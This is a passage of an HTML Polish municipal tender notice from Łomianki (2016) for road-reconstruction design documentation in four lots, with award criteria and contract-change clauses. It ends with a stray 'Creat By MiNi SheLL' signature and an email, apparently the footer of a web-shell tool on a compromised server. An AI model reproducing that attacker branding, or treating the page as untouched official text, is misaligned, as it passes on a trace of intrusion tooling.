Zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów.

W przypadku gdy ofertę składać będzie kilku przedsiębiorców prowadzących działalność a oferta nie będzie podpisana przez wszystkich wspólników, Wykonawca obowiązany jest dołączyć do oferty odpowiednie pełnomocnictwo udzielone przez pozostałych wspólników. 

Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania, zwraca się do Zamawiającego w sprawie toczącego się postępowania i do niego Zamawiający kieruje informacje, korespondencje itp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania 180, 195 lub 210 dni od dnia zawarcia umowy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z § 15 Wzoru umowy
1.	Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności
z zastrzeżeniem art. 144 ustaw Prawo zamówień publicznych.
2.	Zamawiający przewiduje możliwość dokonania istotnych zmian w niniejszej umowie w szczególności:

1)	W przypadku wystąpienia okoliczności niezależnych od Wykonawcy uniemożliwiających wykonanie przedmiotu umowy w terminie określonym w § 1 ust. 4, Zamawiający może przedłużyć termin wykonania przedmiotu umowy o czas niezbędny do jej wykonania. Wykonawca może najpóźniej na 7 dni roboczych przed terminem realizacji poszczególnych prac objętych umową, powiadomić pisemnie Zamawiającego o zamiarze ubiegania się o przedłużenie terminu wykonania poszczególnych prac, dostarczając Zamawiającemu wyczerpujące i szczegółowe uzasadnienie swojego wniosku, pod warunkiem, że przyczyny te nie wynikają z uchybień lub z niedochowania należytej staranności Wykonawcy. Nie złożenie przedmiotowego wniosku w określonym terminie pozbawia Wykonawcę możliwości przedłużenia terminu umowy. Zamawiający ma cztery dni robocze od daty otrzymania pisma na ustosunkowanie się do złożonego wniosku
i powiadomienie Wykonawcy o swojej decyzji,
2)	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
3)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
4)	w przypadku zmian przepisów prawa oraz wydanych do nich aktów wykonawczych w zakresie zmian dotyczących stawki podatku VAT,
5)	w przypadku zmian przepisów prawa oraz wydanych do nich aktów wykonawczych powiązanych z ustawą Pzp lub przepisami związanymi z przedmiotem zamówienia,
6)	w przypadku wstrzymania wykonywania niniejszej usługi lub przerw  powstałych z przyczyn leżących po stronie Zamawiającego,
7)	w przypadku wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
3.	Ewentualne przesunięcie terminu zakończenia realizacji przedmiotu umowy nastąpi o tyle dni, przez ile trwały przyczyny, o których mowa powyżej, przy czym wymagają one potwierdzenia przez Przedstawiciela Zamawiającego.
4.	Wszelkie ewentualne zmiany będą dokonane w formie aneksu i nie będą stanowić podstawy do zwiększenia wynagrodzenia  określonego w § 5 ust. 1 z wyjątkiem  ust. 2 pkt. 4 niniejszego paragrafu.
5.	W razie zaistnienia istotnej zmiany okoliczności  powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
6.	W przypadku o którym mowa w ust. 5, Wykonawca może żądać wyłącznie wynagrodzenia należytego  z tytułu  wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lomianki.pl/index.php?sc=122&m=6<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na pisemny wniosek w siedzibie Urzędu Miejskiego Łomianki, ul. Warszawska 115, 
pok. nr 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2016 godzina 10:00, miejsce: W siedzibie Urzędu Miejskiego Łomianki, ul. Warszawska 115, 
pok. nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadania
 - Przebudowa ul. Konopnickiej - zad 2015/34,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:

Opracowanie dokumentacji projektowo - kosztorysowej dla zadania pn.: Przebudowa
ul. Konopnickiej w zakresie wyznaczenia ścieżki rowerowej  na odc. od ul. Kolejowej do szpitala
w Dz. Leśnym ok. 1 500 m..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 210.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania 180, 195 lub 210 dni od dnia zawarcia umowy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadania



- Przebudowa ul. Długiej - zad 2013/03..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje: Opracowanie dokumentacji projektowo - kosztorysowej dla zadania pn.: Przebudowa ul. Długiej
w Łomiankach na odcinku od ul. Wąskiej do ul. Brukowej o długości ok. 600 mb..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 210.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania 180, 195 lub 210 dni od dnia zawarcia umowy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadania - Kompleksowa przebudowa dróg gminnych w kwartałach ulic - VII kwartał
(ul. Wiślana- ul. Długa - ul. Graniczna - ul. Kampinoska) - zad 2016/06,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dotyczy ulic:
- ul. Graniczna (odc. od ul. Akacjowej do ul. Długiej) - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 500 m
- ul. Rataja M. wraz z sięgaczem - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 330 m
- ul. Sezamkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 120m
- ul. Żywiczna (odc. od ul. Akacjowej do ul. Kampinoskiej) - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 500 m
- ul. Łyżwiarska - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 280 m
- ul. Narciarska - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 380 m
- ul. Sportowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 180 m
- ul. Świerkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 180 m
- ul. Wesoła - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 260 m

Wykonanie chodników zależne będzie od szerokości pasów drogowych i proponowanych na etapie koncepcji rozwiązań geometrycznych.

Dokumentację należy wykonać dla każdej ulicy odrębnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 210.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania 180, 195 lub 210 dni od dnia zawarcia umowy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadania - Kompleksowa przebudowa dróg gminnych w kwartałach ulic - VIII kwartał 
(ul. Wiklinowa - ul. Rolnicza - ul. Ogrodowa - ul. Warszawska) - zad 2016/12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dotyczy ulic:

- ul. Porzeczkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 250 m
- ul. Truskawkowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 310m
- ul. Jarzębinowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
-  o długości ok. 600 m
- ul. Leszczynowa - przebudowa w zakresie wykonania nawierzchni jezdni wraz z chodnikiem / ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 450 m
- ul. Bukowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
-  o długości ok. 210 m
- ul. Wiązowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
-  o długości ok. 215 m
- ul. Klonowa - przebudowa w zakresie wykonania nawierzchni jezdni wraz z chodnikiem / ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 490 m
- ul. Podpułkownika Józefa Krzyczkowskiego - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 400 m.
- ul. Żołnierzy Narwiku - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia - o długości ok. 400 m. 
- ul. Cyprysowa - przebudowa w zakresie wykonania ciągu pieszo - jezdnego oraz odwodnienia
- o długości ok. 330 m
 
Wykonanie chodników zależne będzie od szerokości pasów drogowych i proponowanych na etapie koncepcji rozwiązań geometrycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 210.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania 180, 195 lub 210 dni od dnia zawarcia umowy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com